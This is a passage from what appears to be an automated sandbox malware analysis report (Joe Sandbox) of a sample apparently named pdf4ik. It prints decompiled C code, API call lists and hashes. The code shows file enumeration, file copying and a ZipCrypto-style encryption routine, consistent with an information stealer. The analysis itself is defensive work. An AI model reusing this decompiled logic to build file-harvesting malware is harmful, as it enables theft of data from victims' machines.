                                        											_t314 = 9;
                                        											_v1180 = 9;
                                        										}
                                        									}
                                        									_v1140 = _t314;
                                        									_t315 = _v1204;
                                        									_v1178 = _t315;
                                        									__eflags = _t315 - _t587;
                                        									if(__eflags != 0) {
                                        										L37:
                                        										_v1168 = _t587;
                                        									} else {
                                        										_t396 =  *((intOrPtr*)(_t407 + 0x70));
                                        										__eflags = _t396 - _t587;
                                        										if(__eflags < 0) {
                                        											goto L37;
                                        										} else {
                                        											_v1168 = _t396 + _v1208;
                                        										}
                                        									}
                                        									_t589 =  *(_t407 + 0x58);
                                        									_v1164 =  *((intOrPtr*)(_t407 + 0x70));
                                        									_v1132 =  *(_t407 + 0x18) +  *((intOrPtr*)(_t407 + 0x10));
                                        									_v27 =  *(_t407 + 0x58) & 0x000000ff;
                                        									_v1144 = 0;
                                        									_v1136 =  *((intOrPtr*)(_t407 + 0x4c));
                                        									_v868 =  &_v32;
                                        									_t318 =  *(_t407 + 0x5c);
                                        									_v864 =  &_v56;
                                        									_v26 = (_t318 << 0x00000020 | _t589) >> 8;
                                        									_v23 =  *(_t407 + 0x50) & 0x000000ff;
                                        									_v25 = (_t318 << 0x00000020 | _t589) >> 0x10;
                                        									_t590 =  *(_t407 + 0x50);
                                        									_t457 = (_t318 << 0x00000020 | _t589) >> 0x18;
                                        									_t320 =  *(_t407 + 0x54);
                                        									_v22 = (_t320 << 0x00000020 | _t590) >> 8;
                                        									_v21 = (_t320 << 0x00000020 | _t590) >> 0x10;
                                        									_t591 =  *(_t407 + 0x60);
                                        									_v20 = (_t320 << 0x00000020 | _t590) >> 0x18;
                                        									_v19 =  *(_t407 + 0x60);
                                        									_t323 =  *(_t407 + 0x64);
                                        									_v18 = (_t323 << 0x00000020 | _t591) >> 8;
                                        									_v17 = (_t323 << 0x00000020 | _t591) >> 0x10;
                                        									_v32 = 0xd5455;
                                        									_t127 =  &_v32; // 0xd5455
                                        									_v28 = 7;
                                        									_v16 = (_t323 << 0x00000020 | _t591) >> 0x18;
                                        									_v56 =  *_t127;
                                        									_t592 = _t407;
                                        									_v1156 = 0x11;
                                        									_v1152 = 9;
                                        									_v24 = _t457;
                                        									_v52 = _v28;
                                        									_v48 = _t457;
                                        									_v54 = 5;
                                        									_t326 = E29DAB070(_t457,  &_v1184, _t407, __eflags);
                                        									__eflags = _t326;
                                        									if(_t326 == 0) {
                                        										_t327 = _v1160;
                                        										_t458 = _v1156;
                                        										_t143 = _t327 + 0x1e; // 0x2f
                                        										_t531 = _t458 + _t143;
                                        										 *(_t407 + 0x18) =  *(_t407 + 0x18) + _t458 + _t143;
                                        										__eflags =  *(_t407 + 0x14);
                                        										if( *(_t407 + 0x14) == 0) {
                                        											_t593 = _t407 + 0x30;
                                        											 *((intOrPtr*)(_t407 + 0x34)) = 0x23456789;
                                        											 *((intOrPtr*)(_t407 + 0x38)) = 0x34567890;
                                        											_t408 =  *_t407;
                                        											 *_t593 = 0x12345678;
                                        											__eflags = _t408;
                                        											if(_t408 != 0) {
                                        												while(1) {
                                        													__eflags =  *_t408;
                                        													if( *_t408 == 0) {
                                        														goto L46;
                                        													}
                                        													E29DABB00(_t593);
                                        													_t408 = _t408 + 1;
                                        													__eflags = _t408;
                                        													if(_t408 != 0) {
                                        														continue;
                                        													}
                                        													goto L46;
                                        												}
                                        											}
                                        											L46:
                                        											__eflags =  *0x29dd86e9;
                                        											if( *0x29dd86e9 == 0) {
                                        												_t388 = GetDesktopWindow();
                                        												__eflags = _t388 ^ GetTickCount();
                                        												E29DAFCE4(_t388 ^ GetTickCount());
                                        												_t599 = _t599 + 4;
                                        											}
                                        											_t562 = 0;
                                        											__eflags = 0;
                                        											do {
                                        												 *((char*)(_t598 + _t562 - 0x28)) = E29DAFCF6(__eflags) >> 7;
                                        												_t562 = _t562 + 1;
                                        												__eflags = _t562 - 0xc;
                                        											} while (__eflags < 0);
                                        											_t459 =  *_t593;
                                        											_t532 = 0;
                                        											__eflags = 0;
                                        											_v33 = _v1176 >> 8;
                                        											_t332 = _t593[8];
                                        											_v1200 = 0;
                                        											_v1196 = _t593[4];
                                        											do {
                                        												_t461 =  *(0x29dcd9b0 + (( *(_t598 + _t532 - 0x28) ^ _t459) & 0x000000ff) * 4) ^ _t459 >> 0x00000008;
                                        												_t569 = 1 + ((_t461 & 0x000000ff) + _v1196) * 0x8088405;
                                        												 *_t593 = _t461;
                                        												_t593[4] = _t569;
                                        												_t334 = _t332 >> 0x00000008 ^  *(0x29dcd9b0 + ((_t569 >> 0x00000018 ^ _t332) & 0x000000ff) * 4);
                                        												_t412 = _v1200;
                                        												_t593[8] = _t334;
                                        												 *(_t598 + _t412 - 0x28) = ((_t332 & 0x0000fffd | 0x00000002) ^ 0x00000001) * (_t332 & 0x0000fffd | 0x00000002) >> 0x00000008 ^  *(_t598 + _t412 - 0x28);
                                        												_t546 = _t412;
                                        												_v1188 =  *(_t598 + _t546 - 0x27) & 0x000000ff;
                                        												_v1200 = _t334 & 0x0000fffd | 0x00000002;
                                        												_t421 =  *(0x29dcd9b0 + ((_v1188 ^ _t461) & 0x000000ff) * 4) ^ _t461 >> 0x00000008;
                                        												_t466 = 1 + ((_t421 & 0x000000ff) + _t569) * 0x8088405;
                                        												 *_t593 = _t421;
                                        												_v1196 = _t421;
                                        												_t593[4] = _t466;
                                        												_t574 = _t334 >> 0x00000008 ^  *(0x29dcd9b0 + ((_t466 >> 0x00000018 ^ _t334) & 0x000000ff) * 4);
                                        												 *(_t598 + _t546 - 0x27) = (_v1200 ^ 0x00000001) * _v1200 >> 0x00000008 ^ _v1188;
                                        												_t427 =  *(_t598 + _t546 - 0x26);
                                        												_v1188 = _t427;
                                        												_v1200 = _t574 & 0x0000fffd | 0x00000002;
                                        												_t341 = _v1196;
                                        												_v1196 = _t341 >> 8;
                                        												_t593[8] = _t574;
                                        												_t344 =  *(0x29dcd9b0 + ((_t427 ^ _t341) & 0x000000ff) * 4) ^ _v1196;
                                        												_v1196 = _t344;
                                        												 *_t593 = _t344;
                                        												_t348 = 1 + ((_t344 & 0x000000ff) + _t466) * 0x8088405;
                                        												_t593[4] = _t348;
                                        												_t576 = _t574 >> 0x00000008 ^  *(0x29dcd9b0 + ((_t348 >> 0x00000018 ^ _t574) & 0x000000ff) * 4);
                                        												 *(_t598 + _t546 - 0x26) = (_v1200 ^ 0x00000001) * _v1200 >> 0x00000008 ^ _v1188;
                                        												_t436 =  *((intOrPtr*)(_t598 + _t546 - 0x25));
                                        												_v1188 = _t436;
                                        												_v1200 = _t576 & 0x0000fffd | 0x00000002;
                                        												_t475 = _v1196;
                                        												_t593[8] = _t576;
                                        												_v1196 = _t475 >> 8;
                                        												_t459 =  *(0x29dcd9b0 + ((_t436 ^ _t475) & 0x000000ff) * 4) ^ _v1196;
                                        												_t532 = _t546 + 4;
                                        												_t351 = 1 + (_t348 + (_t459 & 0x000000ff)) * 0x8088405;
                                        												_t593[4] = _t351;
                                        												_v1196 = _t351;
                                        												 *_t593 = _t459;
                                        												_t332 = _t576 >> 0x00000008 ^  *(0x29dcd9b0 + ((_t351 >> 0x00000018 ^ _t576) & 0x000000ff) * 4);
                                        												_t593[8] = _t332;
                                        												 *(_t598 + _t532 - 0x29) = (_v1200 ^ 0x00000001) * _v1200 >> 0x00000008 ^ _v1188;
                                        												_v1200 = _t532;
                                        												__eflags = _t532 - 0xc;
                                        											} while (_t532 < 0xc);
                                        											_t407 = _v1212;
                                        											_t587 = 0;
                                        											__eflags =  *_t407;
                                        											if( *_t407 == 0) {
                                        												L58:
                                        												_t355 = 0;
                                        												__eflags = 0;
                                        											} else {
                                        												__eflags = _v1189;
                                        												if(_v1189 == 0) {
                                        													_t506 =  &_v44;
                                        													_t459 = _t407;
                                        													E29DABF80(_t407,  &_v44, 0xc);
                                        													_t230 = _t407 + 0x18;
                                        													 *_t230 =  *(_t407 + 0x18) + 0xc;
                                        													__eflags =  *_t230;
                                        												}
                                        												__eflags =  *_t407 - _t587;
                                        												if( *_t407 == _t587) {
                                        													goto L58;
                                        												} else {
                                        													__eflags = _v1189;
                                        													if(_v1189 != 0) {
                                        														goto L58;
                                        													} else {
                                        														_t355 = 1;
                                        													}
                                        												}
                                        											}
                                        											__eflags = _v1189;
                                        											 *((char*)(_t407 + 0x2d)) = _t355;
                                        											if(_v1189 != 0) {
                                        												 *(_t407 + 0x90) = _t587;
                                        											} else {
                                        												_t383 = _v1204;
                                        												__eflags = _t383 - 8;
                                        												if(_t383 != 8) {
                                        													__eflags = _t383 - _t587;
                                        													if(__eflags == 0) {
                                        														_t587 = E29DAC7D0(_t459, _t407, __eflags);
                                        													}
                                        												} else {
                                        													_t587 = E29DAC6C0(_t459, _t407,  &_v1184);
                                        												}
                                        											}
                                        											__eflags =  *((char*)(_t407 + 0x80));
                                        											 *((char*)(_t407 + 0x2d)) = 0;
                                        											if( *((char*)(_t407 + 0x80)) != 0) {
                                        												_t381 =  *(_t407 + 0x7c);
                                        												__eflags = _t381;
                                        												if(_t381 != 0) {
                                        													CloseHandle(_t381);
                                        												}
                                        											}
                                        											_t478 =  *(_t407 + 0x90);
                                        											_t302 =  *(_t407 + 0x14);
                                        											_t552 =  *((intOrPtr*)(_t407 + 0x74));
                                        											 *(_t407 + 0x18) =  *(_t407 + 0x18) + _t478;
                                        											 *(_t407 + 0x7c) = 0;
                                        											 *((intOrPtr*)(_t407 + 0x70)) = _t552;
                                        											__eflags =  *(_t407 + 0x14);
                                        											if( *(_t407 + 0x14) != 0) {
                                        												goto L92;
                                        											} else {
                                        												__eflags = _t587;
                                        												if(_t587 != 0) {
                                        													goto L40;
                                        												} else {
                                        													_t358 = _v1208 + _t478;
                                        													__eflags = _v1168 - _t358;
                                        													_t532 =  *(_t407 + 0x78);
                                        													_t481 = _t478 & 0xffffff00 | _v1168 == _t358;
                                        													__eflags =  *((char*)(_t407 + 0x1c));
                                        													_v1172 =  *(_t407 + 0x78);
                                        													_v1168 = _t358;
                                        													_v1164 = _t552;
                                        													if( *((char*)(_t407 + 0x1c)) == 0) {
                                        														L79:
                                        														_t359 = _v1204;
                                        														__eflags = _v1178 - _t359;
                                        														if(_v1178 == _t359) {
                                        															__eflags = _t359;
                                        															if(__eflags != 0) {
                                        																L83:
                                        																_t587 = _t407;
                                        																_t552 =  &_v1184;
                                        																_t360 = E29DAB310(_t481,  &_v1184, _t407, __eflags);
                                        																__eflags = _t360;
                                        																if(_t360 != 0) {
                                        																	goto L40;
                                        																} else {
                                        																	_t278 = _t407 + 0x18;
                                        																	 *_t278 =  *(_t407 + 0x18) + 0x10;
                                        																	__eflags =  *_t278;
                                        																	_v1180 = _v1140;
                                        																	goto L85;
                                        																}
                                        															} else {
                                        																__eflags = _t481;
                                        																if(__eflags == 0) {
                                        																	goto L80;
                                        																} else {
                                        																	goto L83;
                                        																}
                                        															}
                                        														} else {
                                        															L80:
                                        															__eflags = _v12 ^ _t598;
                                        															return E29DADF46(0x4000000, _t407, _v12 ^ _t598, _t532, _t552, _t587);
                                        														}
                                        													} else {
                                        														__eflags =  *_t407 - _t587;
                                        														if( *_t407 == _t587) {
                                        															L73:
                                        															__eflags = _v1180 & 0x00000001;
                                        															_v1178 = _v1204;
                                        															if((_v1180 & 0x00000001) == 0) {
                                        																_t481 = 0xfff7;
                                        																_t264 =  &_v1180;
                                        																 *_t264 = _v1180 & 0x0000fff7;
                                        																__eflags =  *_t264;
                                        															}
                                        															_v1140 = _v1180;
                                        															_t532 = _v1132 -  *((intOrPtr*)(_t407 + 0x10));
                                        															__eflags = E29DAC0E0(_t407, _v1132 -  *((intOrPtr*)(_t407 + 0x10)));
                                        															if(__eflags == 0) {
                                        																L78:
                                        																__eflags = _v12 ^ _t598;
                                        																return E29DADF46(0x2000000, _t407, _v12 ^ _t598, _t532, _t552, _t587);
                                        															} else {
                                        																_t587 = _t407;
                                        																_t552 =  &_v1184;
                                        																_t378 = E29DAB070(_t481,  &_v1184, _t407, __eflags);
                                        																__eflags = _t378;
                                        																if(_t378 != 0) {
                                        																	goto L40;
                                        																} else {
                                        																	_t506 =  *(_t407 + 0x18);
                                        																	_t380 = E29DAC0E0(_t407,  *(_t407 + 0x18));
                                        																	__eflags = _t380;
                                        																	if(_t380 != 0) {
                                        																		L85:
                                        																		_t302 =  *(_t407 + 0x14);
                                        																		__eflags =  *(_t407 + 0x14);
                                        																		if(__eflags != 0) {
                                        																			goto L92;
                                        																		} else {
                                        																			_t362 = E29DAE70E(_t407, _t532, _t552, _t587, __eflags, _v1152);
                                        																			_t548 = _v1152;
                                        																			_t594 = _t362;
                                        																			E29DB0010(_t594, _v864, _v1152);
                                        																			_v864 = _t594;
                                        																			_t365 = E29DAE70E(_t407, _v1152, _t552, _t594, __eflags, 0x360);
                                        																			_t595 =  &_v1184;
                                        																			_t366 = memcpy(_t365, _t595, 0xd8 << 2);
                                        																			_t582 = _t595 + 0x1b0;
                                        																			_t485 =  *(_t407 + 0x44);
                                        																			__eflags = _t485;
                                        																			if(_t485 != 0) {
                                        																				__eflags =  *(_t485 + 0x35c);
                                        																				while( *(_t485 + 0x35c) != 0) {
                                        																					_t485 =  *(_t485 + 0x35c);
                                        																					__eflags =  *(_t485 + 0x35c);
                                        																				}
                                        																				 *(_t485 + 0x35c) = _t366;
                                        																				__eflags = _v12 ^ _t598;
                                        																				return E29DADF46(0, _t407, _v12 ^ _t598, _t548, _t582, _t595);
                                        																			} else {
                                        																				 *(_t407 + 0x44) = _t366;
                                        																				__eflags = _v12 ^ _t598;
                                        																				return E29DADF46(0, _t407, _v12 ^ _t598, _t548, _t582, _t595);
                                        																			}
                                        																		}
                                        																	} else {
                                        																		goto L78;
                                        																	}
                                        																}
                                        															}
                                        														} else {
                                        															__eflags = _v1189;
                                        															if(_v1189 == 0) {
                                        																goto L79;
                                        															} else {
                                        																goto L73;
                                        															}
                                        														}
                                        													}
                                        												}
                                        											}
                                        										} else {
                                        											E29DAC660(_t592);
                                        											__eflags = _v12 ^ _t598;
                                        											return E29DADF46( *(_t407 + 0x14), _t407, _v12 ^ _t598, _t531,  &_v1184, _t592);
                                        										}
                                        									} else {
                                        										E29DAC660(_t592);
                                        										L40:
                                        										__eflags = _v12 ^ _t598;
                                        										return E29DADF46(0x400, _t407, _v12 ^ _t598, _t532, _t552, _t587);
                                        									}
                                        								}
                                        							}
                                        						}
                                        					} else {
                                        						__eflags = _v12 ^ _t598;
                                        						return E29DADF46(0x50000, __ecx, _v12 ^ _t598, __edx, _t552, __edx);
                                        					}
                                        				} else {
                                        					return E29DADF46(0x40000, __ecx, _v12 ^ _t598, __edx, _t552, __edx);
                                        				}
                                        			}


























































































































                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /$UT
                                        • API String ID: 0-1626504983
                                        • Opcode ID: 7f64c2ae4b6e8a2c89bc7a6cd02578be3cc12a531d3320d3402f898ada034343
                                        • Instruction ID: db2866c6731c9aa878440052262d416d49c561fe4fb28ed16219066e2bdabb4c
                                        • Opcode Fuzzy Hash: 7f64c2ae4b6e8a2c89bc7a6cd02578be3cc12a531d3320d3402f898ada034343
                                        • Instruction Fuzzy Hash: 0242E8B1A002598FCB24CF78C88039EBBB1EF95310F1484EED949A7741DB349A96DF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • wsprintfA.USER32 ref: 29D9B9B2
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D9B9C9
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9B9EC
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9BA06
                                        • wsprintfA.USER32 ref: 29D9BA2E
                                        • StrCmpCA.SHLWAPI(?,015A4C58), ref: 29D9BA45
                                        • StrCmpCA.SHLWAPI(?,015A2ED8), ref: 29D9BA93
                                          • Part of subcall function 29D9ACA0: _memset.LIBCMT ref: 29D9ACDC
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,015A1F98,?,?,29DCD617), ref: 29D9ACF2
                                          • Part of subcall function 29D9ACA0: _malloc.LIBCMT ref: 29D9ACFA
                                          • Part of subcall function 29D9ACA0: GetTickCount.KERNEL32 ref: 29D9AD07
                                          • Part of subcall function 29D9ACA0: _rand.LIBCMT ref: 29D9AD20
                                          • Part of subcall function 29D9ACA0: wsprintfA.USER32 ref: 29D9AD35
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD4D
                                          • Part of subcall function 29D9ACA0: CopyFileA.KERNEL32(?,?,00000001), ref: 29D9AD5D
                                          • Part of subcall function 29D9ACA0: _memset.LIBCMT ref: 29D9AD70
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD84
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,015A1A80,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD97
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADA9
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADBD
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,29DCFF1C,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADCF
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADE3
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,.txt,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADF5
                                        • FindNextFileA.KERNEL32(?,?), ref: 29D9BB7C
                                        • FindClose.KERNEL32(?), ref: 29D9BB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileFindwsprintf$_memset$CloseCopyCountFirstNextTick_malloc_rand
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 4056001293-2848263008
                                        • Opcode ID: 0ede09a674c177fde73e7242e8edd5391fcc306d4b39c4fd0c24895e9cea7ca8
                                        • Instruction ID: 0c2e3f5bd1221839eda70c2a155e8ff906fe0736ccd0116c9e76dd60e01f30df
                                        • Opcode Fuzzy Hash: 0ede09a674c177fde73e7242e8edd5391fcc306d4b39c4fd0c24895e9cea7ca8
                                        • Instruction Fuzzy Hash: CB5140B2910218ABDB29EF54DC85EEAB3BDBF44B04F0481DDE50AA3144E6349B45DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 60%
                                        			E29D9C6C0(intOrPtr _a4) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v24;
                                        				char _v1024;
                                        				void* _v2024;
                                        				char _v3024;
                                        				void* _v4024;
                                        				char _v4032;
                                        				intOrPtr _v4036;
                                        				void* _v4040;
                                        				char _v4052;
                                        				intOrPtr _v4060;
                                        				char _v4064;
                                        				char _v4080;
                                        				intOrPtr _v4088;
                                        				char _v4092;
                                        				char _v4108;
                                        				intOrPtr _v4116;
                                        				char _v4120;
                                        				char _v4136;
                                        				intOrPtr _v4144;
                                        				char _v4148;
                                        				char _v4164;
                                        				intOrPtr _v4172;
                                        				char _v4176;
                                        				char _v4192;
                                        				intOrPtr _v4200;
                                        				char _v4220;
                                        				intOrPtr _v4224;
                                        				intOrPtr _v4232;
                                        				intOrPtr _v4236;
                                        				void* _v4240;
                                        				intOrPtr _v4244;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t191;
                                        				signed int _t192;
                                        				signed int _t197;
                                        				CHAR* _t211;
                                        				CHAR* _t223;
                                        				intOrPtr _t227;
                                        				intOrPtr* _t228;
                                        				intOrPtr _t233;
                                        				void* _t241;
                                        				void* _t243;
                                        				void* _t247;
                                        				intOrPtr _t248;
                                        				intOrPtr* _t249;
                                        				void* _t270;
                                        				void* _t272;
                                        				void* _t276;
                                        				intOrPtr _t277;
                                        				intOrPtr* _t278;
                                        				void* _t288;
                                        				char _t289;
                                        				void* _t290;
                                        				signed int _t299;
                                        				void* _t300;
                                        				CHAR* _t305;
                                        				CHAR* _t309;
                                        				char* _t310;
                                        				char _t312;
                                        				intOrPtr _t313;
                                        				CHAR* _t321;
                                        				intOrPtr* _t325;
                                        				CHAR* _t331;
                                        				intOrPtr* _t335;
                                        				CHAR _t347;
                                        				CHAR* _t348;
                                        				void* _t349;
                                        				void* _t363;
                                        				void* _t366;
                                        				char* _t367;
                                        				short* _t368;
                                        				short* _t369;
                                        				void* _t370;
                                        				signed int _t373;
                                        				signed int _t378;
                                        				void* _t380;
                                        				void* _t381;
                                        				intOrPtr _t382;
                                        				intOrPtr* _t383;
                                        				short* _t384;
                                        				void* _t385;
                                        				intOrPtr _t386;
                                        				intOrPtr _t387;
                                        				signed int _t388;
                                        				void* _t389;
                                        				void* _t390;
                                        				char* _t395;
                                        				char* _t396;
                                        
                                        				E29DBCDB0(0x1088);
                                        				_t191 =  *0x29dd5664; // 0xd9555f04
                                        				_t192 = _t191 ^ _t388;
                                        				_v24 = _t192;
                                        				 *[fs:0x0] =  &_v16;
                                        				_t289 = 0;
                                        				_v4244 = _a4;
                                        				E29DB5640( &_v4024, 0, 0x3e8);
                                        				_t390 = _t389 + 0xc;
                                        				_t299 = 0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v4024, _t192, _t363, _t380, _t288,  *[fs:0x0], E29DC3275, 0xffffffff) < 0x00000000;
                                        				_v4172 = 0xf;
                                        				_v4176 = 0;
                                        				_v4192 = 0;
                                        				_t13 = _t299 - 1; // -1
                                        				_t365 = _t13 &  &_v4024;
                                        				_t197 = _t13 &  &_v4024;
                                        				_t14 = _t197 + 1; // 0x0
                                        				_t381 = _t14;
                                        				goto L1;
                                        				do {
                                        					L3:
                                        					_t347 =  *_t223;
                                        					_t223 = _t223 + 1;
                                        					_t408 = _t347;
                                        				} while (_t347 != 0);
                                        				_t348 =  &_v1024;
                                        				E29D892C0(_t310, _t348, _t223 - _t366);
                                        				E29DA4C40( &_v4240, _t408);
                                        				_v8 = 1;
                                        				_t227 = _v4236;
                                        				_t312 = _v4240;
                                        				_v4224 = _t227;
                                        				_t382 = _t312;
                                        				if(_t312 == _t227) {
                                        					L27:
                                        					_t396 = _t395 - 0x1c;
                                        					_t367 = _t396;
                                        					_t228 =  &_v3024;
                                        					 *((intOrPtr*)(_t367 + 0x14)) = 0xf;
                                        					 *((intOrPtr*)(_t367 + 0x10)) = _t289;
                                        					_v4224 = _t396;
                                        					 *_t367 = _t289;
                                        					_t349 = _t228 + 1;
                                        					do {
                                        						_t313 =  *_t228;
                                        						_t228 = _t228 + 1;
                                        						_t420 = _t313 - _t289;
                                        					} while (_t313 != _t289);
                                        					_t350 =  &_v3024;
                                        					E29D892C0(_t367, _t350, _t228 - _t349);
                                        					_t383 = E29DA4C40( &_v4040, _t420);
                                        					if( &_v4240 != _t383) {
                                        						_t262 = _v4240;
                                        						if(_v4240 != _t289) {
                                        							E29D97AC0(_t262, _v4236);
                                        							_push(_v4240);
                                        							E29DADF3B();
                                        							_t396 = _t396 + 4;
                                        						}
                                        						_v4240 = _t289;
                                        						_v4236 = _t289;
                                        						_v4232 = _t289;
                                        						_t350 =  *_t383;
                                        						_v4240 = _t350;
                                        						_v4236 =  *((intOrPtr*)(_t383 + 4));
                                        						_v4232 =  *((intOrPtr*)(_t383 + 8));
                                        						 *_t383 = _t289;
                                        						 *((intOrPtr*)(_t383 + 4)) = _t289;
                                        						 *((intOrPtr*)(_t383 + 8)) = _t289;
                                        					}
                                        					_v8 = 1;
                                        					_t368 = _v4040;
                                        					if(_t368 == _t289) {
                                        						L41:
                                        						_t233 = _v4236;
                                        						_t369 = _v4240;
                                        						_v4224 = _t233;
                                        						_t384 = _t369;
                                        						if(_t369 == _t233) {
                                        							L65:
                                        							if(_t369 == _t289) {
                                        								L72:
                                        								_v4240 = _t289;
                                        								_v4236 = _t289;
                                        								_v4232 = _t289;
                                        								if(_v4172 >= 0x10) {
                                        									_push(_v4192);
                                        									_t233 = E29DADF3B();
                                        								}
                                        								 *[fs:0x0] = _v16;
                                        								_pop(_t370);
                                        								_pop(_t385);
                                        								_pop(_t290);
                                        								return E29DADF46(_t233, _t290, _v24 ^ _t388, _t350, _t370, _t385);
                                        							}
                                        							_t386 = _t233;
                                        							if(_t369 == _t233) {
                                        								L71:
                                        								_push(_t369);
                                        								_t233 = E29DADF3B();
                                        								_t396 = _t396 + 4;
                                        								goto L72;
                                        							} else {
                                        								goto L67;
                                        							}
                                        							do {
                                        								L67:
                                        								if( *((intOrPtr*)(_t369 + 0x14)) >= 8) {
                                        									_t350 =  *_t369;
                                        									_push( *_t369);
                                        									E29DADF3B();
                                        									_t396 = _t396 + 4;
                                        								}
                                        								 *((intOrPtr*)(_t369 + 0x14)) = 7;
                                        								 *((intOrPtr*)(_t369 + 0x10)) = _t289;
                                        								 *_t369 = 0;
                                        								_t369 = _t369 + 0x1c;
                                        							} while (_t369 != _t386);
                                        							_t369 = _v4240;
                                        							goto L71;
                                        						} else {
                                        							goto L42;
                                        						}
                                        						do {
                                        							L42:
                                        							_v4052 = 0;
                                        							_v4032 = 7;
                                        							_v4036 = _t289;
                                        							E29D97940( &_v4052, _t384, _t289);
                                        							_v8 = 9;
                                        							_t241 = E29DA48F0( &_v4052,  &_v4220, _t350);
                                        							_v8 = 0xa;
                                        							_t321 =  *0x29dd7ffc; // 0x15a40d8
                                        							_t243 = E29D95460( &_v4164,  &_v4192, _t321);
                                        							_v8 = 0xb;
                                        							_t373 = E29D89980(_t241, _t243,  &_v4080);
                                        							_v8 = 0xc;
                                        							_t247 = E29DA48F0( &_v4052,  &_v4108,  &_v4080);
                                        							_v8 = 0xd;
                                        							_t248 =  *0x29dd7d2c; // 0x15a2f38
                                        							_t249 = E29D89930(_t248,  &_v4136, _t247);
                                        							_t396 = _t396 + 0x14;
                                        							_v8 = 0xe;
                                        							if( *((intOrPtr*)(_t373 + 0x14)) >= 0x10) {
                                        								_t373 =  *_t373;
                                        							}
                                        							if( *((intOrPtr*)(_t249 + 0x14)) >= 0x10) {
                                        								_t249 =  *_t249;
                                        							}
                                        							_t325 =  *((intOrPtr*)(_v4244 + 0x20));
                                        							if(_t325 != 0) {
                                        								__eflags =  *_t325 - 2;
                                        								if( *_t325 == 2) {
                                        									 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t325 + 4)), _t373, _t249, 0, 2);
                                        									_t350 = 0x10;
                                        								} else {
                                        									 *0x29dd8814 = 0x80000;
                                        								}
                                        							} else {
                                        								 *0x29dd8814 = 0x10000;
                                        							}
                                        							if(_v4116 >= _t350) {
                                        								_push(_v4136);
                                        								E29DADF3B();
                                        								_t396 = _t396 + 4;
                                        								_t350 = 0x10;
                                        							}
                                        							_v4116 = 0xf;
                                        							_v4120 = 0;
                                        							_v4136 = 0;
                                        							if(_v4088 >= _t350) {
                                        								_push(_v4108);
                                        								E29DADF3B();
                                        								_t396 = _t396 + 4;
                                        								_t350 = 0x10;
                                        							}
                                        							_v4088 = 0xf;
                                        							_v4092 = 0;
                                        							_v4108 = 0;
                                        							if(_v4060 >= _t350) {
                                        								_push(_v4080);
                                        								E29DADF3B();
                                        								_t396 = _t396 + 4;
                                        								_t350 = 0x10;
                                        							}
                                        							_v4060 = 0xf;
                                        							_v4064 = 0;
                                        							_v4080 = 0;
                                        							if(_v4144 >= _t350) {
                                        								_push(_v4164);
                                        								E29DADF3B();
                                        								_t396 = _t396 + 4;
                                        								_t350 = 0x10;
                                        							}
                                        							_v4144 = 0xf;
                                        							_v4148 = 0;
                                        							_v4164 = 0;
                                        							if(_v4200 >= _t350) {
                                        								_push(_v4220);
                                        								E29DADF3B();
                                        								_t396 = _t396 + 4;
                                        							}
                                        							_v8 = 1;
                                        							if(_v4032 >= 8) {
                                        								_push(_v4052);
                                        								E29DADF3B();
                                        								_t396 = _t396 + 4;
                                        							}
                                        							_t384 = _t384 + 0x1c;
                                        							_t289 = 0;
                                        						} while (_t384 != _v4224);
                                        						_t233 = _v4236;
                                        						_t369 = _v4240;
                                        						goto L65;
                                        					} else {
                                        						_t387 = _v4036;
                                        						if(_t368 == _t387) {
                                        							L40:
                                        							_push(_t368);
                                        							E29DADF3B();
                                        							_t396 = _t396 + 4;
                                        							goto L41;
                                        						}
                                        						do {
                                        							if( *((intOrPtr*)(_t368 + 0x14)) >= 8) {
                                        								_push( *_t368);
                                        								E29DADF3B();
                                        								_t396 = _t396 + 4;
                                        							}
                                        							_t350 = 0;
                                        							 *((intOrPtr*)(_t368 + 0x14)) = 7;
                                        							 *((intOrPtr*)(_t368 + 0x10)) = _t289;
                                        							 *_t368 = 0;
                                        							_t368 = _t368 + 0x1c;
                                        						} while (_t368 != _t387);
                                        						_t368 = _v4040;
                                        						goto L40;
                                        					}
                                        				} else {
                                        					goto L5;
                                        				}
                                        				do {
                                        					L5:
                                        					_v4052 = 0;
                                        					_v4032 = 7;
